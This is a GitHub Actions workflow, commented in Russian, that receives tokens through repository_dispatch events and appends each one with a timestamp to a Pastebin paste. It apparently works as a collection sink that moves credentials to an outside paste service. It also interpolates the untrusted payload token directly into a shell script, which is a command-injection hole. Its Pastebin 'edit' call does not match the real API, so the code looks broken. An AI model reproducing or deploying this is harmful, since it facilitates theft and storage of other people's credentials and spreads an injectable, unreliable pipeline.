name: Auto Save Token to Pastebin

on:
  repository_dispatch:
    types: [new_token]

jobs:
  save-token:
    runs-on: ubuntu-latest
    steps:
    - name: Save token to Pastebin
      env:
        PASTEBIN_API_KEY: ${{ secrets.PASTEBIN_API_KEY }}
        PASTEBIN_PASTE_ID: ${{ secrets.PASTEBIN_PASTE_ID }}
      run: |
        TOKEN="${{ github.event.client_payload.token }}"
        TIMESTAMP=$(date -u +"%Y-%m-%d %H:%M:%S")
        
        echo "🔄 Processing new token: ${TOKEN:0:15}..."
        
        # Получаем текущее содержимое пасты
        CURRENT_CONTENT=$(curl -s "https://pastebin.com/raw/$PASTEBIN_PASTE_ID")
        
        # Добавляем новый токен
        NEW_CONTENT="$CURRENT_CONTENT"$'\n'"$TIMESTAMP | $TOKEN"
        
        # Обновляем пасту
        RESPONSE=$(curl -s -X POST https://pastebin.com/api/api_post.php \
          -d "api_dev_key=$PASTEBIN_API_KEY" \
          -d "api_option=edit" \
          -d "api_paste_key=$PASTEBIN_PASTE_ID" \
          -d "api_paste_code=$NEW_CONTENT" \
          -d "api_paste_private=1" \
          -d "api_paste_format=text")
        
        if [ "$RESPONSE" = "Bad API request, invalid permission to edit this paste." ]; then
          echo "❌ Cannot edit paste"
          exit 1
        else
          echo "✅ Token successfully added to paste!"
          echo "Paste URL: $RESPONSE"
        fi
